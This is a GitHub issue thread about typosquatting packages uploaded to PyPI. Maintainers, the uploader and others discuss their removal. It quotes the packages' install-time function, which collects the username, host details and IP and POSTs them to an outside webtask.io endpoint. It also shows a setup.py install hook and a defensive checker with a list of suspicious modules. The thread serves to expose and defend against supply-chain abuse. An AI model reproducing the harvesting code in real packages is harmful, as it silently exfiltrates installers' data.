Package spam #644
Comments
The packages seem mildly malicious as well. From their `def fun():`

```python
# Standard-library imports the quoted function relies on; `request()` is the
# package's own HTTP helper and is not part of the quoted excerpt.
import getpass
import hashlib
import json
import os
import platform
import socket
import tempfile


def fun():
    username = getpass.getuser()
    hostinfo = platform.uname()
    # Marker file named after a hash of the host info, so the beacon fires only once per machine.
    filename = os.path.join(
        tempfile.gettempdir(),
        hashlib.md5(str(hostinfo).encode('utf-8', errors='ignore')).hexdigest()
    )
    if os.path.exists(filename):
        return
    try:
        open(filename, 'w').write(b'')
    except:
        pass
    # Look up the public IP; fall back to the hostname if that fails.
    try:
        ip = request("https://enabledns.com/ip", method='GET')
    except:
        ip = socket.gethostname()
    data = {
        "title": "%s@%s" % (username, ip),
        "body": "I shouldn't install caffe package, here is my host info: %s" % str(hostinfo)
    }
    headers = {
        'Content-Type': 'application/json'
    }
    # Posts username, IP and platform details to a webtask.io endpoint at install time.
    request(
        url='https://wt-90ab2e5e0aca15fe3a2a6945e26eb256-0.run.webtask.io/evilpy',
        method='POST',
        data=json.dumps(data).encode("utf-8", errors='ignore'),
        headers=headers
    )


fun()
```

Here's a full list of them: https://pypi.org/user/evilpy/
Hi, I built the fake packages; allow me to explain this later.
You are uploading fake packages, under the name evilpy, that harvest information from people who try to install them. I do not need an explanation; I do ask that you remove them.
@fate0 please remove those packages immediately or I will delete all of your packages and lock your account.
Time to explain. I am a Security Researcher and also a Python Programmer. In the last few days, I uploaded several fake or evil packages to PyPI to check out In the first edition, I used webtask.io to transfer data to cookiecutter-evil-pypackage, but this repository has been disabled by GitHub staff. In the second edition, I just uploaded the user data to my server, finding some place to publish the data. Today, I feel disappointed when I know someone has done this before: Typosquatting programming language package managers. BUT, after one year has passed, NOTHING CHANGED!!! Every day there are still about 2200 people installing the evil packages. @r1chardj0n3s I have removed all of the packages from PyPI, so let other guys add whatever they want.
Thanks.
He hasn't removed the packages. https://pypi.python.org/pypi/requirements-txt/1.1.1
All of the packages added by That

```python
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import sys
import json
import setuptools
from setuptools.command.install import install


class AbortInstall(install):
    # Replaces the install command, so `pip install ztz` stops here instead of installing anything.
    def run(self):
        raise SystemExit(
            "[+] It looks like you try to install ztz without checking it.\n"
            "[-] is that alright? \n"
            "[*] Please visit http://evilpackage.fatezero.org/ \n"
            "[/] Aborting installation."
        )


setuptools.setup(
    name="ztz",
    version="0.1.1",
    url="http://evilpackage.fatezero.org/",
    author="fate0",
    author_email="[email protected]",
    description="Python wrapper for ztz",
    long_description=open('README.rst').read(),
    packages=setuptools.find_packages(),
    cmdclass={
        'install': AbortInstall
    },
    install_requires=[],
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
    ],
)
```

So, not directly malicious, per se, and not directly spyware, either. It also doesn't appear to directly contradict the PyPI terms of service, but IANAL. Information could still be harvested out of the public Google BigTable data about installers, though.
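A defender-side check for the install-time hook pattern discussed in this thread, added here as an example that is not code from the thread, from PyPI or from Warehouse: it parses a setup.py with `ast` and flags `cmdclass` overrides, subclasses of setuptools commands, and imports that an ordinary build script rarely needs. The module list and the sample setup.py are constructed assumptions.

```python
import ast

# Modules rarely needed by an honest setup.py but used by the harvesting
# snippet quoted in this thread (illustrative list, an assumption).
SUSPICIOUS_MODULES = {"socket", "urllib", "requests", "getpass", "platform", "hashlib"}
SETUPTOOLS_COMMANDS = {"install", "develop", "egg_info", "build_py"}

# Constructed sample in the shape of the ztz setup.py quoted above (not the real file).
SAMPLE_SETUP_PY = '''
import setuptools
from setuptools.command.install import install
class AbortInstall(install):
    def run(self):
        raise SystemExit("aborting")
setuptools.setup(name="ztz", version="0.1.1", cmdclass={"install": AbortInstall})
'''

def inspect_setup_py(source):
    """Statically flag install-time hooks in setup.py source; returns a dict of findings."""
    findings = {"overridden_commands": [], "hook_classes": [], "suspicious_imports": []}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPICIOUS_MODULES:
                    findings["suspicious_imports"].append(alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in SUSPICIOUS_MODULES:
                findings["suspicious_imports"].append(node.module)
        elif isinstance(node, ast.ClassDef):
            # A subclass of a setuptools command (e.g. `install`) runs when pip builds the package.
            for base in node.bases:
                name = base.id if isinstance(base, ast.Name) else getattr(base, "attr", None)
                if name in SETUPTOOLS_COMMANDS:
                    findings["hook_classes"].append(node.name)
        elif isinstance(node, ast.Call):
            func = node.func  # handles both `setup(...)` and `setuptools.setup(...)`
            fname = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
            if fname != "setup":
                continue
            for kw in node.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    findings["overridden_commands"] += [
                        k.value for k in kw.value.keys if isinstance(k, ast.Constant)]
    return findings

def has_install_hook(source):
    """True when setup() swaps a build/install command for custom code."""
    f = inspect_setup_py(source)
    return bool(f["overridden_commands"] or f["hook_classes"])
```

A hit is a reason to read the sdist before installing, not proof of malice: legitimate packages also override commands, which is exactly why the thread's aborting setup.py is hard to distinguish from the harvesting one without looking at the code.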
I've removed the
@jamadden @katelynsills @dstufft detailed info is here: Package 钓鱼 (Package Phishing). You can see the details of how I bypass
@dstufft BTW,
Nobody had reported those names so I was unaware of them. I'll deal with them later tonight.
The site is being spammed with fake packages like:
http://pypi.python.org/pypi/pygpu/0.1.0
http://pypi.python.org/pypi/tkinter/0.1.0
There are more, just look for the description:
"just for fun : )"